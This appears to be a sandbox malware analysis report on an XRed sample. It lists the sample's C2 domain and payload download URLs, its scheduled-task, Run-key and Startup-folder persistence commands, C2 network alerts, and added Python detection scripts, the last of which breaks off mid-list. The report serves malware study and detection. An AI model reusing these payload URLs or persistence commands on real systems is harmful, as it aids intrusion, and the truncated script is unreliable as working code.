Windows Analysis Report
Machine-PO.exe

Overview

General Information

Sample name: Machine-PO.exe
Analysis ID: 1582336
MD5: a6bd561711ea8c2064c20644cceee074
SHA1: cb330a1ad78387bdc401142feecac763ac63d3d9
SHA256: e6f8edcbe69419008b7e54f8554fc1aec66208de10c26a982d624ea91aed8092
Tags: exeknkbkk212user-JAMESWT_MHT

Detection

XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected ProcessChecker

Classification

  • System is w10x64
  • Machine-PO.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\Machine-PO.exe" MD5: A6BD561711EA8C2064C20644CCEEE074)
    • ._cache_Machine-PO.exe (PID: 1060 cmdline: "C:\Users\user\Desktop\._cache_Machine-PO.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
      • cmd.exe (PID: 5524 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7016 cmdline: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 756 cmdline: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 6892 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
      • WerFault.exe (PID: 7816 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 2996 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7144 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 2760 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • TCPKPY.exe (PID: 3240 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 6216 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • Synaptics.exe (PID: 7628 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • TCPKPY.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 8088 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 7772 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • cleanup
Malware configuration (XRed, extracted from Machine-PO.exe):
{
  "C2 url": "xred.mooo.com",
  "Email": "xredline1@gmail.com",
  "Payload urls": [
    "http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978",
    "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download",
    "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1",
    "http://xred.site50.net/syn/SUpdate.ini",
    "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download",
    "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1",
    "http://xred.site50.net/syn/Synaptics.rar",
    "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download",
    "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1",
    "http://xred.site50.net/syn/SSLLibrary.dll"
  ]
}
Source | Rule | Description | Author
Machine-PO.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security
Machine-PO.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\UAINOJ.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
C:\ProgramData\Synaptics\RCX7868.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
C:\ProgramData\Synaptics\RCX7868.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\Documents\PIVFAGEAAV\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security
C:\Users\user\Documents\PIVFAGEAAV\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
(2 further entries not included in this export)

Source | Rule | Description | Author
00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000007.00000002.2753117932.0000000002C98000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000007.00000002.2754697002.0000000002E60000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
Process Memory Space: Machine-PO.exe PID: 5988 | JoeSecurity_XRed | Yara detected XRed | Joe Security
(1 further entry not included in this export)

Source | Rule | Description | Author
0.0.Machine-PO.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security
0.0.Machine-PO.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

                              System Summary

Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_Machine-PO.exe, Initiated: true, ProcessId: 1060, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49729
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Machine-PO.exe" , ParentImage: C:\Users\user\Desktop\._cache_Machine-PO.exe, ParentProcessId: 1060, ParentProcessName: ._cache_Machine-PO.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 756, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Machine-PO.exe" , ParentImage: C:\Users\user\Desktop\._cache_Machine-PO.exe, ParentProcessId: 1060, ParentProcessName: ._cache_Machine-PO.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 756, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Machine-PO.exe" , ParentImage: C:\Users\user\Desktop\._cache_Machine-PO.exe, ParentProcessId: 1060, ParentProcessName: ._cache_Machine-PO.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 756, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_Machine-PO.exe, ProcessId: 1060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UAINOJ
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_Machine-PO.exe, ProcessId: 1060, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, CommandLine: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5524, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, ProcessId: 7016, ProcessName: schtasks.exe
Source: Process started | Author: Michael Haag | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Machine-PO.exe" , ParentImage: C:\Users\user\Desktop\._cache_Machine-PO.exe, ParentProcessId: 1060, ParentProcessName: ._cache_Machine-PO.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 756, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Machine-PO.exe, ProcessId: 5988, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 6892, TargetFilename: C:\Users\user\AppData\Local\Temp\GZrLyJhZ.xlsm
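The Sigma hits above describe one persistence chain: a scheduled task that relaunches TCPKPY.exe from %APPDATA% every minute, WScript running a .vbs out of %TEMP%, a Run key in HKCU and one under WOW6432Node pointing into AppData and ProgramData, and a .lnk dropped into the Startup folder. The checks below re-implement those conditions as plain Python over Sysmon-style event records. This is an added example, not Joe Sandbox or Sigma code; the five malicious events are constructed from the command lines, registry paths and file path shown in the hits, the two benign events (a daily backup task and a script under Program Files) are made up as negative controls, and the rule names and the list of user-writable directories are the example's own choices.

```python
"""Host-side triage rules for the persistence chain seen in this report.

Added example (not Joe Sandbox or Sigma code).  Each rule takes one
Sysmon-style event dict and returns True when it matches.  The event
records are constructed from the command lines and registry/file paths in
the report's Sigma hits, plus two constructed benign controls.
"""
import re
from typing import Callable, Dict, List, Tuple

# Directories any user (or any process) can write to.  Persistence pointing
# here rather than into Program Files or System32 is the actual signal.
USER_WRITABLE = re.compile(
    r"\\(AppData|ProgramData|Users\\Public|Windows\\Temp|Temp)\\", re.I)
TEMP_DIR = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh)\b", re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)


def _opt(cmdline: str, flag: str) -> str:
    """Value of a schtasks-style '/flag value' option, quotes stripped ('' if absent)."""
    m = re.search(rf'{re.escape(flag)}\s+("[^"]*"|\S+)', cmdline, re.I)
    return m.group(1).strip('"') if m else ""


def rule_schtasks_user_path(ev: dict) -> bool:
    """schtasks /create whose /tr target lives in a user-writable directory."""
    if ev["type"] != "process" or not ev["image"].lower().endswith("\\schtasks.exe"):
        return False
    cmd = ev["cmdline"]
    if not re.search(r"/create\b", cmd, re.I):
        return False
    # In the report the schedule is '/sc minute /mo 1': a relaunch loop, not admin work.
    return bool(USER_WRITABLE.search(_opt(cmd, "/tr")))


def rule_script_host_from_temp(ev: dict) -> bool:
    """wscript/cscript executing a script file from a Temp directory."""
    if ev["type"] != "process":
        return False
    host = ev["image"].rsplit("\\", 1)[-1].lower()
    return (host in {"wscript.exe", "cscript.exe"}
            and bool(TEMP_DIR.search(ev["cmdline"]))
            and bool(SCRIPT_EXT.search(ev["cmdline"])))


def rule_run_key_user_path(ev: dict) -> bool:
    """Run/RunOnce value (HKCU, HKLM or WOW6432Node) pointing into a user-writable dir."""
    return (ev["type"] == "registry"
            and bool(RUN_KEY.search(ev["key"]))
            and bool(USER_WRITABLE.search(ev["value"])))


def rule_startup_folder_write(ev: dict) -> bool:
    """Any file written into a Start Menu\\Programs\\Startup folder."""
    return ev["type"] == "file" and bool(STARTUP_DIR.search(ev["path"]))


RULES: Dict[str, Callable[[dict], bool]] = {
    "schtasks_target_in_user_writable_dir": rule_schtasks_user_path,
    "script_host_from_temp": rule_script_host_from_temp,
    "run_key_to_user_writable_dir": rule_run_key_user_path,
    "startup_folder_file_write": rule_startup_folder_write,
}

# Constructed events: ids 1-5 reproduce the report's Sigma hits, 6-7 are benign controls.
EVENTS: List[dict] = [
    {"id": 1, "type": "process", "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1"},
    {"id": 2, "type": "process", "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r"WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs"},
    {"id": 3, "type": "registry",
     "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UAINOJ",
     "value": r"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"},
    {"id": 4, "type": "registry",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver",
     "value": r"C:\ProgramData\Synaptics\Synaptics.exe"},
    {"id": 5, "type": "file",
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk"},
    {"id": 6, "type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn NightlyBackup /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'},
    {"id": 7, "type": "process", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript C:\Program Files\Inventory\collect.vbs"},
]


def evaluate(events: List[dict]) -> List[Tuple[str, int]]:
    """Run every rule over every event; return (rule name, event id) for each hit."""
    return [(name, ev["id"]) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, event_id in evaluate(EVENTS):
        print(f"event {event_id}: {name}")
```

Run against the constructed events, the five report-derived records each trigger exactly one rule and the two controls trigger none. The user-writable-directory test is what separates the malicious schtasks and Run-key events from legitimate ones; the task name UAINOJ.exe and the Synaptics value name are noise that changes per sample and should not be what a detection keys on.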
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:25:21.973413+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49709 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:21.983606+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:22.983824+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:22.985548+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:23.999293+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49720 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:24.000765+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49719 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:24.986489+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49726 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:25.013805+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49727 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:26.525947+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49739 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:26.528668+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49740 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:27.504824+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49747 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:27.506655+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49745 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:28.527130+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49751 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:28.554577+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49750 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:29.499616+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49754 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:29.610977+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49756 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:30.172789+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49762 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:31.148666+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49768 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:31.167329+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49769 | 216.58.206.46 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:25:24.118958+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49729 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:09.772081+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49808 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:46.015797+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49962 | 172.111.138.100 | 5552 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:25:22.585705+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49714 | 69.42.215.252 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49808 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49962 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49729 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49802 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49805 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50055 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49806 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49786 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50084 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49809 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49903 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49838 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:24.118958+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49729 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:33.601726+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49786 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:42.653846+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49802 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:51.662498+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49805 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:00.695939+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49806 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:09.772081+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49808 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:18.834904+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49809 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:27.913134+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49838 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:36.944363+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49903 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:46.015797+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49962 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:59.990974+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50055 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:27:09.023215+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50084 | 172.111.138.100 | 5552 | TCP
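The alert tables above show the same 172.111.138.100:5552 sessions (the C2 connection also flagged by the Sigma network rule) alerting roughly every nine seconds, with one gap of about fourteen seconds, while the TLS connections to 216.58.206.46:443 come in pairs a second apart. The script below turns that observation into a reusable beaconing check: alerts are grouped per destination, alerts from several rules on the same connection are collapsed, and the inter-arrival times are judged with a robust spread statistic (median absolute deviation divided by the median) so that a single missed beacon does not mask the pattern, as a standard deviation would. This is an added example, not Joe Sandbox or Suricata code; the records are constructed from the timestamps, ports and SIDs in the tables (the twelve identically timestamped rows of the last table are left out), and the thresholds of five connections and a 0.1 spread ratio are the example's own.

```python
"""Periodicity check over Suricata-style alert records.

Added example (not Joe Sandbox or Suricata code).  Groups alerts by
(dest_ip, dest_port), de-duplicates alerts for the same connection and
flags destinations whose inter-arrival times cluster tightly.  The records
below are constructed from the report's alert tables.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median
from typing import Dict, List, Set, Tuple

# (timestamp, src_port, dest_ip, dest_port, sid), constructed from the report tables.
ALERTS: List[Tuple[str, int, str, int, int]] = [
    # sid 2044887: TLS to 216.58.206.46:443, two connections per second
    ("2024-12-30T11:25:21.973413+01:00", 49709, "216.58.206.46", 443, 2044887),
    ("2024-12-30T11:25:21.983606+01:00", 49710, "216.58.206.46", 443, 2044887),
    ("2024-12-30T11:25:22.983824+01:00", 49715, "216.58.206.46", 443, 2044887),
    ("2024-12-30T11:25:22.985548+01:00", 49713, "216.58.206.46", 443, 2044887),
    ("2024-12-30T11:25:23.999293+01:00", 49720, "216.58.206.46", 443, 2044887),
    ("2024-12-30T11:25:24.000765+01:00", 49719, "216.58.206.46", 443, 2044887),
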